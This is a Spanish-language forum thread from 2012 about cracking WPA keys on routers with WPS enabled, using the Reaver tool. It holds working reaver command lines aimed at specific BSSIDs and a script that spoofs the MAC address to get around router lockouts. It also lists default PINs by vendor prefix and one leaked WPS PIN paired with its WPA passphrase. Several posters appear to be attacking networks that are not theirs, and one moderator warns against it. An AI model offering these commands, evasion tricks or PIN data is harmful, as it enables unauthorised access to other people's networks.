Changing the MAC address of the virtual monitor mode interface (typically named mon0) WILL NOT WORK. You must change the MAC address of your wireless card's physical interface. For example:

# ifconfig wlan0 down
# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
# ifconfig wlan0 up
# airmon-ng start wlan0
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69

Es más, en muchos sitios recomiendan el spoof, puesto que el ataque por WPS es detectable. Tambien es cierto que si hay que hacer un spoof cada pocos X intentos, la cosa cambia y deja de ser algo viable.
Esto empieza a ser una movida muy rara.. A cada cual le vá como quiere.  :-[
Mañana por la mañana aré pruebas con el asunto y te comento, ya tengo echado el ojo a unos cuantos con WPS ON.

yo lo hago con el macchanger, es lo mismo recién probé.

Les Cuento mi experiencia con reaver: empeze el Lunes a sacar una clave me demore 3 dias, termine el miercoles en la noche.. el resultado?
(http://k21.kn3.net/13A5F50B0.png)
http://k21.kn3.net/13A5F50B0.png
Ahora estoy desde el jueves tratando de sacar otra clave pero llevo 1.04% en tres dias bueno hasta hace 10 minutos 0,78% pero leyendo los comments probe cambiando la mac y me funciono me acepta 12 request y aparece esto
Código:
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
^C
Pero ya es un avanze a que me tire todo el rato el mismo error
Tambien cree un script para que me cambie la mac y inicie reaver
Código:
#!bin/sh
ifconfig wlan1 down
macchanger -r wlan1
ifconfig wlan1 up

reaver -i mon0 -b 00:1D:XX:XX:XX:XX -vv
Saludos!!

algo es algo pero no se salta el router que se bloquea por 24 horas. Fíjate que ahí esta el M6, el reaver detecto que el router tiene los primeros 4 dígitos 5888xxxx desde ahí solo cambiara los últimos 4 hasta encontrar el pin. Así que quizás mi base de datos tenga un efecto positivo. El M7 es q encontró los otros 4. como comienza la MAC del Router?

cabe destacar que también leí que según parece el router tiene un micro y una memoria, al intentar tantos ataques este se sobre cargar y se reinicia o prácticamente desaparece.

PD: para el que quiera aportar su pin; para la base de datos de WPSCrackGUI, parcial (primeros 4 dígitos) o completo (8 dígitos), puede enviarlo desde aquí (http://lix.in/-aff5d3).


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: tainonaino en 21 Febrero 2012, 21:49 pm
Hola P4nd3m0n1um no quiero quitarte la ilusion pero dudo que el pin y la wpa sigan un patron o que se produzcan equivalencias o repeticiones en ambas.De hecho tu clave puede ser "PATATA" y ya me diras que relacion puedes establecer con el pin.
Creo ,esta es mi experiencia personal, que la distancia al router es la que va a determinar en gran medida el tiempo de respuesta en cada intento .
Yo he tardado unas 7 horas en conseguir una wpa2 a unos 40 m y unas 4 horas a unos 10 m , como consecuencia de la demora en la recepcion de la respuesta del r
outer que hace que reaver repita el mismo pin en varias ocasiones..
Un dato, los routers con BSSID 38:60:77:xx:xx:xx traen como pin por defecto 12345670 asi que al primer intento salen.
En ocasiones , a mi me ha pasado que el reaver me ha dado solo el pin pero repitiendo el proceso ,si es que reaver ya habia agotado todos los posibles pins;al final tambien me proporcionaba la wpa.
En fin, un saludo..


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 21 Febrero 2012, 22:01 pm
Hola P4nd3m0n1um no quiero quitarte la ilusion pero dudo que el pin y la wpa sigan un patron o que se produzcan equivalencias o repeticiones en ambas.De hecho tu clave puede ser "PATATA" y ya me diras que relacion puedes establecer con el pin.

nunca dije que pasaba eso, solamente vi varias "en ESPAÑA" solamente que paso lo que conté anteriormente que el pin estaba en parte de la WPA pero eso no quiere decir que en todos los routers pase, mas un solamente en los usuarios que no son ni capases de cambiar contraseñas o dejan siempre la por defecto si esta existe o no.

Creo ,esta es mi experiencia personal, que la distancia al router es la que va a determinar en gran medida el tiempo de respuesta en cada intento .

eso mismo me dijo el tipito del reaver pero no es tan así, tener el router al 98% (como estar dentro del router) de señal no indica que se pueda crackear rápido fijate yo, mas de 8 días sin nada, ya estoy por llegar al 80% en el reaver y nada... espero que salga algo...

Yo he tardado unas 7 horas en conseguir una wpa2 a unos 40 m y unas 4 horas a unos 10 m , como consecuencia de la demora en la recepcion de la respuesta del r
outer que hace que reaver repita el mismo pin en varias ocasiones..
Un dato, los routers con BSSID 38:60:77:xx:xx:xx traen como pin por defecto 12345670 asi que al primer intento salen.
En ocasiones , a mi me ha pasado que el reaver me ha dado solo el pin pero repitiendo el proceso ,si es que reaver ya habia agotado todos los posibles pins;al final tambien me proporcionaba la wpa.
En fin, un saludo..

también al contactarme con el del reaver me dijo que se sobrecargan por eso es que resultan estas fallas, mas bien podemos imaginar que por cada pin le pegamos un martillazo al router, va a llegar un momento en el que el router no responda mas... jeje que ejemplo!

Buena data la del 38:60:77 y gracias por compartirla.

En ocasiones , a mi me ha pasado que el reaver me ha dado solo el pin pero repitiendo el proceso ,si es que reaver ya habia agotado todos los posibles pins;al final tambien me proporcionaba la wpa.
En fin, un saludo..

ese es un error que vi en el sitio del reaver, hay veces que te da la WPA en hex, hay q repetir varias veces para determinar la final.

gracias por tu información ha sido de gran ayuda.  ;-)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 22 Febrero 2012, 15:58 pm
recién termine pero no logro entrar al router como admin para ver si el wps es por defecto, en la configuración normal ni figura.

tambien el otro router, sigue bloqueado, no se desbloqueo y hace dias que no es atacado...  :¬¬


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: junno en 23 Febrero 2012, 13:51 pm
buenas, tengo una WLAN_BE7E, he comprobado que tenga el WPS activado y es asi, la mac en 00:19:15:XXXXXXX, he probado wifymagickey, pero como la contraseña no es la de defecto, no me da la correcta.

estos dias estoy probando reaver, el problema viene en el momento en el que me pongo con ello, todo va bien, pero lo he dejado toda la noche y siempre me da lo siguiente:

Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Sending EAPOL START request

de vez en cuando pone el porcentaje, cada 20 o 25 minutos, y siempre se queda en 0.00%

la calidad de la señal es optima -15db, -20db.

uso wifiway 3.4, obtengo modo monitor de la tarjeta bien y ya he probado en otras redes WEP con exito.

haber si alguien me hecha una manita.

un saludo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: namco04 en 23 Febrero 2012, 14:54 pm
Si no pones los comandos que usas no podemos ver lo que pasa,
puede ser el nivel de señal o el rqx calidad de la señal que tambien es importante, aveces se pilla con -65 pero la calidad es de 18% entonces lo que te indicaria ese mensaje es que no se comunica bien con el router,
yo creo que eso es lo que te pasa, porque a mi me ocurria con una antena casera que tecnicamente cogia 4 de 5 rayas pero no llegaba a conectar ni con windows ni linux, luego me di cuenta q la calidad era malisima y por eso era porque luego lo mejore, -60 calidad 90% y ahi ya iba de perlas.


Ahora a lo que venia,
mi pregunta sobre reaver es si existe algun comando para que empiece el reaver a partir del 2500xxxx por ejemplo para arriba, se me fue la luz el otro dia al 25%, aveces se apaga el ordena y me jode vivo asi que ya se que tiene que estar del 2500 para arriba, paso de tirarme otras 8 horas esperando

No me sirve como respuesta el comando -p xxxxxxxx porque es para fijar 4 o 8 cifras y yo lo que quiero es avanzar a partir de ahi


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: junno en 23 Febrero 2012, 15:06 pm
la señal es buena de fijo, tanto windows linux, el movil, la xbox, otro portatil, todos me dan la misma señal, y el router le tengo a 3 o 4 metros, ya que esta en la planta de abajo.

los comandos que utilizo son:

reaver -i mon0 -b 00:19:15:XXXXXXX -vv

reaver -i mon0 -b 00:19:15:XXXXXXX -c 2 -vv ( el canal es el 2)

y alguno que otro mas.

el washl no me encuentra la red, el inflator 1.0 tampoco, pero se que tiene el WPS activo ya que daba el valor 0x02.

la verdad que esto es un reto aveces....


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ChimoC en 23 Febrero 2012, 15:54 pm
Buenas:

@junno: Por favor, no pongas BSSIDs completos.

En principio el PIN de tu router es 12345670. Cambia la WPA que viene por defecto y desactiva el WPS

Un saludo

ChimoC


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: junno en 23 Febrero 2012, 15:57 pm
Perdón por poner los datos completos, la pasa por defecto esta cambiada, y estoy probando el reaver para sacarla, si des activo Wps no podre hacerlo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: lessionone en 23 Febrero 2012, 18:56 pm
Hola buenas, yo lanzo el siguiente comando en bt5 r1, reaver 1.4 y BCM4312:
Código:
reaver -i mon0 -b A0:21:B7:XX:XX:XX -c 3 -vv -d 15 --fail-wait=360
El Caso es que reaver se asocia y hace su trabajo pero me pone WPS transaction failed (code: 0x03), re-trying last pin
Como es logico cuando me aparece el porcentaje esta en 0% y siempre probando el mismo pin y mismo error o el mismo error con el code: 0x02
1º¿Esto es que esta bloqueado el router?
Si fuera bloqueo del router
2º¿no deberia de aparecer con wps off cuando le paso el Walsh?, porque si le paso el walsh me aparece el ap con wps on.
Haber si alguien me responde a estas dos preguntitas por favor.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 23 Febrero 2012, 22:25 pm
Hola buenas, yo lanzo el siguiente comando en bt5 r1, reaver 1.4 y BCM4312:
Código:
reaver -i mon0 -b A0:21:B7:XX:XX:XX -c 3 -vv -d 15 --fail-wait=360
El Caso es que reaver se asocia y hace su trabajo pero me pone WPS transaction failed (code: 0x03), re-trying last pin
Como es logico cuando me aparece el porcentaje esta en 0% y siempre probando el mismo pin y mismo error o el mismo error con el code: 0x02

ami también me pasaba, probaba y tiraba (code: 0x02, 03) y después seguía sin problemas.

1º¿Esto es que esta bloqueado el router?
Si fuera bloqueo del router
2º¿no deberia de aparecer con wps off cuando le paso el Walsh?, porque si le paso el walsh me aparece el ap con wps on.
Haber si alguien me responde a estas dos preguntitas por favor.

1) No es bloqueo del router, es problema de recepción y envió. El error de bloqueo del router es este:

Código
  1. [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-trying

Código
  1. [!] ADVERTENCIA: Detectado tasa de AP que limita, a la espera 60 segundos antes de volver a intentar

2) esta bien que el WPS este en Off eso es el bloqueo, eso indica que tiene WPS y puede ser atacado, cuando aparece ON es que esta bloqueado, la clumna se llama "WPS Locked", mas bien si dudas de esto puedes usar otros como WPScan o WPScript.

por ejemplo te doy esta imagen:
(http://hydrus.files.wordpress.com/2012/01/wash-reaver.png)

como ves en el WASH hay 3 redes, las tres tienen WPS activado y aun mas estas no están bloqueadas, el bloqueo se da gracias a que el router se sobrecarga o no tiene la suficiente memoria como para responder tan rápido.

también puede ser cosa de drivers, solamente esta soportados:

ath9k
rtl8187
carl19170
ipw2000
rt2800pci
rt73usb


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: pedorap en 7 Marzo 2012, 15:04 pm
buenas queria unirme al tema de conversacion reaver.. ya que llevo unos dias probando este metodo haber que tal va...
bueno empecemos.
mi antena es ralink 3070, y si es compatible con wifiwa3.4
bueno mi caso es este.
use primero wireshack, para comprobar que tenia el wps activo y asi era.
despues use el reaver, con comando

reaver -i mon0 -b macap -vv -d 1

y la primera vez que lo use.. empezo a andar bien.. paro al 0.15% y me salto este mensaje

Código
  1. [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-trying

desde entonces lo pruebe cuando lo pruebe... me sigue dando este mensajito..ya sea al dia siguiente o al otro.. no hay manera...
antes por lo menos asociaba.. una sveces no me ha asociado, y otras directamente asocia y me manda este mensaje... y asi puedo estar los dias enteros que le da igual.. la mac es C0:AC:54
creo que es libebox pero le cambiarlo el nombre a disabled xD
la se;al la pillo al 100% aveces al 90% pero quiere decir que esta justo encima.. ya que debajo no tengo gente viviendo xD

llevo cuatro dias probando con esa mac haber si hay manera o no...

si hace falta mas informacion diganmelo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: wijack_32 en 7 Marzo 2012, 20:57 pm


Creo que ese tipo de chipset no es compatible en el primer post de chimo C de este hilo lo pone leetelo.Un saludo a todos Fieras.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: pedorap en 8 Marzo 2012, 01:36 am
pedorap

 Desconectado

Mensajes: 10



    Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
« Respuesta #85 en: Hoy a las 15:04 »   

--------------------------------------------------------------------------------
buenas queria unirme al tema de conversacion reaver.. ya que llevo unos dias probando este metodo haber que tal va...
bueno empecemos.
mi antena es ralink 3070, y si es compatible con wifiwa3.4
bueno mi caso es este.
use primero wireshack, para comprobar que tenia el wps activo y asi era.
despues use el reaver, con comando

reaver -i mon0 -b macap -vv -d 1

y la primera vez que lo use.. empezo a andar bien.. paro al 0.15% y me salto este mensaje


Código
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-trying

desde entonces lo pruebe cuando lo pruebe... me sigue dando este mensajito..ya sea al dia siguiente o al otro.. no hay manera...
antes por lo menos asociaba.. una sveces no me ha asociado, y otras directamente asocia y me manda este mensaje... y asi puedo estar los dias enteros que le da igual.. la mac es C0:AC:54
creo que es libebox pero le cambiarlo el nombre a disabled xD
la se;al la pillo al 100% aveces al 90% pero quiere decir que esta justo encima.. ya que debajo no tengo gente viviendo xD

llevo cuatro dias probando con esa mac haber si hay manera o no...

si hace falta mas informacion diganmelo

Creo que ese tipo de chipset no es compatible en el primer post de chimo C de este hilo lo pone leetelo.Un saludo a todos Fieras.

hay gente que confirma que si que es compatible.. y ami la primera vez que lo ejecute me dejo hasta x% por lo cual.. inyecto y se puso en funcionamiento..pero puede ser po rlo que dicen.. que el router se colapsa y me dice que nanai que pruebe otro dia... nose..


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 8 Marzo 2012, 12:08 pm
pedorap: has leído mis mensajes anteriores, he hablado de esto, el router llega a ciertos intentos se queda sin memoria (esto me dijo el del reaver) y se bloquea, el bloqueo puede durar de 5 minutos a 5 días por lo que he probado. intenta hacer el ataque normal reaver -b macap -vv

según los datos que tengo uno de C0:AC:54 que es 12345670.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: pedorap en 8 Marzo 2012, 17:45 pm
si he leido todo el post entero , solo queria aportar o intentar aportar alguna cosa mas.. o que alguien que le pasara lo mismo y lo solucionara que lo aportara para el resto, como dije anteriormente.. la antena es una kasems 60000n con chip "teoricamente real" rtl 3070 de ralink y consiguio hacer un 15% y desde entonces nada de nada.. segun he leido.. el primer pin que prueba es ese que me dices.. y pasa de largo.. eso quiere decir.. que , o lo a cambiado, o no es ese..Segun mi teoria lo a cambiado lo mismo que la clave, ya que era una libebox y ahora se llama disabled.

una preguntilla, si el pin lo a cambiado, dificilmente lo sacara el reaver verdad? y si el pin fuese el mismo de fabrica, la clave aunque la ubiese cambiado saldria averiguando el pin?

Por favor, está repetido hasta la saciedad que aquí NO ayudamos a robar.... voy a empezar a borrar posts que incumplan esa norma


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: beholdthe en 9 Marzo 2012, 02:19 am
Una pregunta, tiene que ver para que el ataque sea efectivo, la tarjeta con la que se realice.
Es que he probado con diferentes tarjetas (todas funcionan genial en modo monitor, o con aircrack) y dan problemas de asociación con mi router.
He probado a tener un cliente conectado, y el resultado es el mismo.
Con Wash, de 100 veces que lo lanzo, una me funciona (en teoría) y detecta que mi router es vulnerable, pero luego con reaver jamas asocia y obviamente no es un problema de distancia, así que empiezo a pensar que es por un problema de compatibilidad con las tarjetas.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 9 Marzo 2012, 11:43 am
Una pregunta, tiene que ver para que el ataque sea efectivo, la tarjeta con la que se realice.
Es que he probado con diferentes tarjetas (todas funcionan genial en modo monitor, o con aircrack) y dan problemas de asociación con mi router.

hay varias que no son compatibles.

He probado a tener un cliente conectado, y el resultado es el mismo.

no tiene nada que ver, no estas capturando nada del usuario.

Con Wash, de 100 veces que lo lanzo, una me funciona (en teoría) y detecta que mi router es vulnerable, pero luego con reaver jamas asocia y obviamente no es un problema de distancia, así que empiezo a pensar que es por un problema de compatibilidad con las tarjetas.

no has pensado que el router se defiende de este ataque? yo tengo uno de mis routers que tras 10 intentos este se bloquea por 1 a 5 dias...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Free4all en 9 Marzo 2012, 13:31 pm
Bueno, como siempre curioseo un poco poraki y por allá, y os comento, a fecha, 1 de marzo de 2012, ha salido
BackTrack5 r2, que trae entre muchas otras herramientas, el reaver ( quiero imaginar que, version actualizada y sin fallos conocidos hasta ahora)

Os dejo enlace a los interesados a la descarga oficial (para facilitaros la vida) y mirare a ver si se ha dado a conocer en el foro su salida en los hilos de OS, y de no ser asi, lo posteare ahi tambien.

http://www.backtrack-linux.org/downloads/

Espero que esto ahorre muchas busquedas y descarga de parches y programas por acá y por allá.
Un saludo.


__________________________________________

Volad mis pequeños volad!!!
__________________________________________



_________________________________________
El mundo no es del mas fuerte, sino del mas listo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 9 Marzo 2012, 15:06 pm
no lo vale descargar por solo

Código:
arduino bluelog bt-audit dirb dnschef dpscan easy-creds extundelete
findmyhash golismero goofile hashcat-gui hash-identifier hexorbase horst hotpatch
joomscan killerbee libhijack magictree nipper-ng patator pipal pyrit
reaver rebind rec-studio redfang se-toolkit sqlsus sslyze sucrack
thc-ssl-dos tlssled uniscan vega watobo wce wol-e xspy



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: beholdthe en 11 Marzo 2012, 23:19 pm
Bien, este fin de semana he tenido a mi disposición ( precisamente para desactivarle WPS ) un router de ONO con WPA2. Como ya ha dicho alguien en este hilo ( creo que fue aquí ) coinciden las pass del WPS y de WPA.
Os daré los datos para el que le interesen:

AP SSID: ONODCXX
WPS:  01318104
WPA PSK:  5013181045

Como vemos, tan solo hay un 5 delante y otro detrás.
El tiempo que ha tardado Reaver ha sido unas 3 o 4 horas.

P.D: Creo que no hay problema en que ponga estos datos aquí, si no es así, perdóname ChimoC y borra el mensaje :D

EDITO: Solo te he maquilla un poco el ESSID  ;)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 11 Marzo 2012, 23:57 pm
Buen dato! y la MAC?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: beholdthe en 12 Marzo 2012, 20:43 pm
Buen dato! y la MAC?

Para eso tengo que pedir permiso, ya que no es mio el router. Si me lo dan, te lo mando por privado.

Alguien sabe con backtrack 5 r2 en modo live usb o live dvd, cuando se hace control+c y nos salva la sesión, donde nos guarda los archivos??  o que archivos genera, para hacer un locate y buscarlos, porque si no, no puedo guardar y luego restaurar de ninguna manera :(:(:(


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 12 Marzo 2012, 20:53 pm
Para eso tengo que pedir permiso, ya que no es mio el router. Si me lo dan, te lo mando por privado.

Alguien sabe con backtrack 5 r2 en modo live usb o live dvd, cuando se hace control+c y nos salva la sesión, donde nos guarda los archivos??  o que archivos genera, para hacer un locate y buscarlos, porque si no, no puedo guardar y luego restaurar de ninguna manera :(:(:(

dale tranka los primeros 6 nomas.

se guarda en /usr/local/etc/reaver/


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: carrrca en 13 Marzo 2012, 00:11 am
Hola soy nuevo en el foro y nuevo en la utilizacion de reaver,espero que me ayuden. Utilizo el reaver 1.4 del wifiway,¿¿como puede ser que lo utilice dos veces en una misma red y el pin de la segunda vez sea distinto al de la primera y no aparezca la clave??

El comando que utilizo es

reaver -i mon0 -b xxxxxxxxx -c x -e xxxxx -d 15 -vv


¿¿que puedo estar haciendo mal??


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: beholdthe en 13 Marzo 2012, 02:04 am
dale tranka los primeros 6 nomas.

se guarda en /usr/local/etc/reaver/

Permiso concedido, aquí tienes los 6 primeros, si quieres mas, mándame un privado:

A0:21:B7:XX:XX:XX

Y muchas gracias por decirme la ruta donde guarda los archivos, me ha sido de muchísima ayuda :D


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 13 Marzo 2012, 15:39 pm
Permiso concedido, aquí tienes los 6 primeros, si quieres mas, mándame un privado:

A0:21:B7:XX:XX:XX

Y muchas gracias por decirme la ruta donde guarda los archivos, me ha sido de muchísima ayuda :D

con eso vasta, gracias!

Hola soy nuevo en el foro y nuevo en la utilizacion de reaver,espero que me ayuden. Utilizo el reaver 1.4 del wifiway,¿¿como puede ser que lo utilice dos veces en una misma red y el pin de la segunda vez sea distinto al de la primera y no aparezca la clave??

El comando que utilizo es

reaver -i mon0 -b xxxxxxxxx -c x -e xxxxx -d 15 -vv

¿¿que puedo estar haciendo mal??

1.- Actualizaste el Reaver del WifiWay, ya que el del WifiWay 3.4 esta desactualizado y pueden pasar cosas como eso.
2.- Verifica esto:

Código:
reaver -i <interfaz> -b <MACAddress> -p <PRIMER-PIN> -vv

si te sale que lo encontro, es problemas del reaver.

3.- Puedes actualizar el reaver bajando el modulo y colocandolo en la carpeta modules o hacer:

en un terminal:

Código:
svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps-read-only

si no comienza a descargar y da error instala svn. luego:

Código:
cd reaver-wps-read-only

Código:
cd src

Código:
./configure

Código:
make

Código:
make install

estando conectado.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: kupu88 en 13 Marzo 2012, 17:34 pm


1.- Actualizaste el Reaver del WifiWay, ya que el del WifiWay 3.4 esta desactualizado y pueden pasar cosas como eso.



Desconocia que habia que actualizar el reaver del wifiway 3.4.... ups Eso es posible que explique porque no me iva bien.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: carrrca en 13 Marzo 2012, 20:23 pm


1.- Actualizaste el Reaver del WifiWay, ya que el del WifiWay 3.4 esta desactualizado y pueden pasar cosas como eso.


Gracias P4nd3m0n1um desconocia que habia que actualizar el reaver, lo intentare haber.

Lo que he hecho es ponerme el reaver 1.3 y con ese ningún problema pero probare ha actualizar el 1.4 haber si es eso.

Un saludo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: jose46lopez en 14 Marzo 2012, 13:52 pm
para el tema del bucle a 99,99% se sabe algo ya?
despues de 1000ypico de intentos no se encontro el pin ni la wpa, en redes ono. tengo reaver 1.4 112


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: carrrca en 14 Marzo 2012, 14:29 pm
para el tema del bucle a 99,99% se sabe algo ya?
despues de 1000ypico de intentos no se encontro el pin ni la wpa, en redes ono. tengo reaver 1.4 112

A mi eso tambien me pasaba, llegaba al 99.99 y hay se quedaba. Si ves que no te aclaras con esto de las actualizaciones quita el reaver 1.4 y ponte el reaver 1.3, yo hice eso y a funcionar.

Como utilizas el wifiway grabado en disco duro, pen o cd???

Por pen o cd se como hacerlo pero si esta grabado en disco duro no se como hacerlo.

¿¿¿Como se pueden desinstalar los modulos grabados en el disco duro???


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: jose46lopez en 14 Marzo 2012, 16:41 pm
A mi eso tambien me pasaba, llegaba al 99.99 y hay se quedaba. Si ves que no te aclaras con esto de las actualizaciones quita el reaver 1.4 y ponte el reaver 1.3, yo hice eso y a funcionar.

Como utilizas el wifiway grabado en disco duro, pen o cd???

Por pen o cd se como hacerlo pero si esta grabado en disco duro no se como hacerlo.

¿¿¿Como se pueden desinstalar los modulos grabados en el disco duro???

Lo tengo por disco duro. Lo unico q si fui capaz de hacer es actualizar reaver a 1.4 con los comandos parecidos a los q pone un compañero mas arriba, pero ya desistalar y tal ni idea. Lo mas rapido yo creo q sera volvera a instalar wifiway, q total no me importa mucho porque no tengo guardado nada en esos 15 gb de particion jeje En un pen tmb lo tengo instalado con reaver 1.3. Probare con el pen y si veo q el bug no aparece en 1.3 pues instalare de nuevo en disco duro el wifiway.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 14 Marzo 2012, 17:00 pm
@jose46lopez @carrrca : muchachos usan wifiway 3.4 q tiene mas bugs, john, los gestores de conexion, reaver.. jaja escuchen esto:

1.- Tienen el reaver al 99,99%, esto quiere decir que le falta testear unos 10 pines supongo, pero como ya pasaron el 90% esto quiere decir que ya tienen los primeros dígitos del pin, si usaron el ataque con -vv pueden ver que cuando cojen estos 4 dígitos les aparecerá un mensaje de M4 y M6, desde ahí comenzara a testear pines cambiando solamente los últimos 4 dígitos, hasta que de con esta contraseña.
2.- Quizás el problema lo tengan en el archivo "diccionario" del reaver, este se crea para cada red que intentamos crackear en "/usr/local/etc/reaver/" con el nombre de la MAC. Este archivo tiene 3 primeras lineas, la primera son los primeros 4 dígitos, podrán ver un 1867 supongan, ese es el numero de fila en el  diccionario que viene después de esas 3 lineas, luego viene otra linea con 765 por ejemplo, esto son los 3 siguientes números y por ultimo hay otra linea con un 7 que seria el ultimo numero, si buscan en la lista esa siguiendo las posiciones, 1867 verán que esta en numero que tomo reaver como los primeros 4 dígitos, luego con los demás y ahí tendrán el pin, el problema quizás no es reaver, les cuento que reaver nunca llega al 100%, osea que nunca llega a su final, si el router le contesto mal en una de estas ocasiones tendrán un pin erróneo, y pueda que no les de la WPA, tendrán que hacer todo de nuevo.
3.- yo probaría lanzar de nuevo el ataque pero especificando los primeros dígitos:

Código
  1. reaver -i <interfaz> -b <mac> -p <pin4digitos> -vv

y esperar haber que pasa, tendría que saltar al 90% rápidamente, sino también tienen mal los primeros 4 pines, yo recomendaría usar el reaver en otro OS. O buscar pines que ya hayan sido crackeados y verificarlos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: jose46lopez en 14 Marzo 2012, 21:44 pm
Este archivo tiene 3 primeras lineas, la primera son los primeros 4 dígitos, podrán ver un 1867 supongan, ese es el numero de fila en el  diccionario que viene después de esas 3 lineas, luego viene otra linea con 765 por ejemplo, esto son los 3 siguientes números y por ultimo hay otra linea con un 7 que seria el ultimo numero, si buscan en la lista esa siguiendo las posiciones, 1867 verán que esta en numero que tomo reaver como los primeros 4 dígitos, luego con los demás y ahí tendrán el pin, el problema quizás no es reaver, les cuento que reaver nunca llega al 100%, osea que nunca llega a su final, si el router le contesto mal en una de estas ocasiones tendrán un pin erróneo, y pueda que no les de la WPA, tendrán que hacer todo de nuevo.

Podrias explicarme esto un poco mejor? es que encontre el archivo q dices, pero no se cuales son los supuestos 4 digitos buenos (4 primeros) con los que deberia volver a probar con -p. Lo que pasa verdaderamente es q se queda al 90,90% probando este pin 99985677, como unas 1000 veces y da el fallo, no llega al 99%.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 15 Marzo 2012, 02:58 am
bueno si salto al 90% eso quiere decir que el pin comienza con 9998, pero es muy raro, el archivo dentro es algo asi:

Código:
7822
304
2
1234
0000
0123
1111
2222
3333
4444
5555
6666
7777
8888
9999
0001
0002
0003
0004
0005
0006
0007
0008
0009
0010
0011

el archivo es un .wpc, la primera linea indica la posición del comienzo del pin en el diccionario que viene debajo de la tercer linea. Entonces vas a la linea 7822 y encuentras que el pin inicia con 7820, pero ojo recuenda que el diccionario empieza en la linea 4 esconces al 7822 le sumamos 4 y nos da 7826:

(http://i.minus.com/i4VlGvt0G5ZAL.PNG)

luego de la linea 10005 comienza un nuevo diccionario, este es de 3 dígitos, entonces en la posición 304 del segundo diccionario encontraremos los números que continúan ojo sumandole los 4 que estan usados por registros osea que los proximos 3 numeros estan en el 308:

(http://i.minus.com/itULPVYBXNHit.PNG)

y la 3er linea que tiene solo un numero, ese es el numero final del pin.

Es un sistema muy raro el que usa el reaver, pero como veras solamente tiene un diccionario de 11.003 lineas a diferencia de las 100.000.000 que tendría que tener.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: jose46lopez en 15 Marzo 2012, 14:35 pm
Entonces el pin a comprobar seria este 78202962, segun tu ejemplo. Pues lo probare haber que tal, si no el pin entero los 4 primeros digitos y haber si hay suerte. Muchisimas gracias.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: kupu88 en 15 Marzo 2012, 17:38 pm
3.- Puedes actualizar el reaver bajando el modulo y colocandolo en la carpeta modules

¿Tienes los moludos del reaver actualizado?. Muchas gracias


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 15 Marzo 2012, 17:49 pm
¿Tienes los moludos del reaver actualizado?. Muchas gracias

están en seguridad wireless, en módulos 3.4 o 3.0


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Cleantesdeasso en 15 Marzo 2012, 17:54 pm
yo no puedo descomprimirlo... algun problema para correrlo en backtrack5? de momento ya te digo q ni lo descomprime, se queda colgado...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: kupu88 en 15 Marzo 2012, 19:39 pm
están en seguridad wireless, en módulos 3.4 o 3.0
gracias  ;)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
